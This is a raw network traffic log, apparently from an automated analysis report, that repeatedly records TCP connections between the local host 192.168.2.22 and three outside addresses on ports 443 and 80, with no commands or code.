                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 14.194.50.211:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 14.194.50.211:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 38.240.44.9:80
                    Source: global trafficTCP traffic: 38.240.44.9:80 -> 192.168.2.22:49164
